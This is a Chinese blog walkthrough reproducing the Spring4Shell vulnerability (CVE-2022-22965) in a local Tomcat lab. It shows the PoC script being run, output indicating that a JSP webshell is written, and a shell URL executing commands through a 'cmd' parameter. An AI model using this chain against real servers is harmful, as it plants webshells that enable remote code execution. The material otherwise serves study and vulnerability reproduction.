「漏洞分析」 CVE-2022-22965-Spring环境搭建及漏洞分析

简介: 上期【漏洞分析】 CVE-2022-22965-Spring漏洞(Spring4Shell)分析及修复方法讲述了发现防御Spring4Shell漏洞,由于某些原因未在文章放出poc。此次为大家详细讲解漏洞利用过程并公开POC脚本。

0x01 概述

上期【漏洞分析】 CVE-2022-22965-Spring漏洞(Spring4Shell)分析及修复方法讲述了发现防御Spring4Shell漏洞,由于某些原因未在文章放出poc。此次为大家详细讲解漏洞利用过程并公开POC脚本,希望大家能帮忙分享,十分感谢。

0x02 搭建环境

环境信息,为了此次复现操碎了心,具体安装根据下面文章按照步骤操作,老妈子级教程
win10/JDK17/apache-tomcat-10.0.18/python3.8
【环境搭建】win10安装配置jdk17
【环境搭建】搭建Java开发环境-tomcat10安装使用
【环境搭建】搭建Python开发环境-安装python3.8

想要尝试自己编译源码复现漏洞,需要安装maven-3.8.5
【环境搭建】搭建Java开发环境-maven篇
0x03 运行项目

下载sechelper-cookun.war包放入tomcat运行项目,出现下面信息表示运行成功(war包放入webapps目录会自动解压出sechelper-cookun)
github

https://github.com/sechelper/Spring4Shell/releases/download/v1.0/sechelper-cookun.war

百度网盘
链接:https://pan.baidu.com/s/1-y-HR5ahlw0Vm9SOOZqaUg?pwd=c4cy提取码:c4cy
ee9602f2d8014a51a40a77a16c3b1c78~noop.png
4d5b09b6252344bcafaccf4165164819~noop.png
eefa1b9b04314533a5748a32fb53e930~noop.png

访问地址,出现hello world表示项目部署成功
http://127.0.0.1:8080/sechelper-cookun/hello?name=world
12455637c0de41419f937edb878c2e9b~noop.png

0x04 漏洞利用

使用poc.py检测漏洞是否存在,注意不要多次执行poc.py会出现未知错误,如要重复执行重启tomcat并删除ROOT目录下shell.jsp文件,运行脚本之前需要安装requests库,否则会报错

js

> pip install requests
Collecting requests
  Using cached https://files.pythonhosted.org/packages/2d/61/08076519c80041bc0ffa1a8af0cbd3bf3e2b62af10435d269a9d0f40564d/requests-2.27.1-py2.py3-none-any.whl
Collecting certifi>=2017.4.17 (from requests)
  Using cached https://files.pythonhosted.org/packages/37/45/946c02767aabb873146011e665728b680884cd8fe70dde973c640e45b775/certifi-2021.10.8-py2.py3-none-any.whl
Collecting urllib3<1.27,>=1.21.1 (from requests)
> python poc.py --url http://127.0.0.1:8080/sechelper-cookun/hello
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 405
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://127.0.0.1:8080/shell.jsp?cmd=whoami

093982a4dadd4a33bf8cf81819b60c86~noop.png

浏览器访问下面连接,出现你电脑用户名说明成功,已经获取shell剩下自由发挥吧

http://127.0.0.1:8080/shell.jsp?cmd=whoami
540beeb7d3b749158dc13242561e3715~noop.png

0x05 小结

关于Spring漏洞(CVE-2022-22965)利用完毕,文章内有任何问题在知识星球提问,关注至察助安获取更多优质网络安全知识,无优质不分享。

相关文章
|
7月前
|
XML 存储 缓存
【深入浅出Spring原理及实战】「缓存Cache开发系列」带你深入分析Spring所提供的缓存Cache管理器的实战开发指南(修正篇)
【深入浅出Spring原理及实战】「缓存Cache开发系列」带你深入分析Spring所提供的缓存Cache管理器的实战开发指南(修正篇)
116 0
|
2月前
|
Java BI API
spring boot 整合 itextpdf 导出 PDF,写入大文本,写入HTML代码,分析当下导出PDF的几个工具
这篇文章介绍了如何在Spring Boot项目中整合iTextPDF库来导出PDF文件,包括写入大文本和HTML代码,并分析了几种常用的Java PDF导出工具。
487 0
spring boot 整合 itextpdf 导出 PDF,写入大文本,写入HTML代码,分析当下导出PDF的几个工具
|
2月前
|
XML Java 应用服务中间件
【Spring】运行Spring Boot项目,请求响应流程分析以及404和500报错
【Spring】运行Spring Boot项目,请求响应流程分析以及404和500报错
185 2
|
3月前
|
设计模式 Java Spring
spring源码设计模式分析(五)-策略模式
spring源码设计模式分析(五)-策略模式
|
3月前
|
负载均衡 Java 网络架构
实现微服务网关:Zuul与Spring Cloud Gateway的比较分析
实现微服务网关:Zuul与Spring Cloud Gateway的比较分析
125 5
|
3月前
|
消息中间件 设计模式 缓存
spring源码设计模式分析(四)-观察者模式
spring源码设计模式分析(四)-观察者模式
|
3月前
|
设计模式 Java Spring
spring源码设计模式分析(六)-模板方法模式
spring源码设计模式分析(六)-模板方法模式
|
3月前
|
设计模式 Java Spring
spring源码设计模式分析(七)-委派模式
spring源码设计模式分析(七)-委派模式
|
3月前
|
设计模式 Java 数据库
spring源码设计模式分析(八)-访问者模式
spring源码设计模式分析(八)-访问者模式
|
3月前
|
设计模式 搜索推荐 Java
spring源码设计模式分析(三)
spring源码设计模式分析(三)